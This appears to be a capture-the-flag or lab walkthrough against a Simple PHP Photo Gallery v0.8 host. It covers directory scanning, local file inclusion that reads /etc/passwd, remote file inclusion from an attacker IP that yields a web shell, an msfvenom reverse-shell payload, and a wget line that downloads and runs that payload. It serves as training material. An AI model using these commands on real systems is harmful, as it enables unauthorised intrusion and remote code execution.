4 :80
http://192.168.144.58/
Simple PHP photo Gallery Landing Page
$ gobuster dir -u http://192.168.144.58 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/images (Status: 301) [Size: 237] [--> http://192.168.144.58/images/]
/image.php (Status: 200) [Size: 1508]
/photos (Status: 301) [Size: 237] [--> http://192.168.144.58/photos/]
/css (Status: 301) [Size: 234] [--> http://192.168.144.58/css/]
/license.txt (Status: 200) [Size: 18511]
/index.php (Status: 200) [Size: 2730]
/db.php (Status: 200) [Size: 0]
/README.txt (Status: 200) [Size: 4041]
/js (Status: 301) [Size: 233] [--> http://192.168.144.58/js/]
/functions.php (Status: 200) [Size: 0]
http://192.168.144.58/image.php
Simple PHP Photo Gallery v0.8
# nikto
+ OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner.
Using https://www.exploit-db.com/exploits/48424
http://192.168.144.58/image.php?img=/etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
michael:x:1000:1000:Michael:/home/michael:/bin/bash
# RFI also working
http://192.168.144.58/image.php?img=http://192.168.49.144/web.php
# got web shell
CMD: whoami;id;hostname;uname -a
apache
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
snookums
Linux snookums 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
# stable shell
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.144 LPORT=445 -f elf -o kshell
CMD: wget 192.168.49.144/kshell -O /tmp/kshell && chmod +x /tmp/kshell && /tmp/kshellLast updated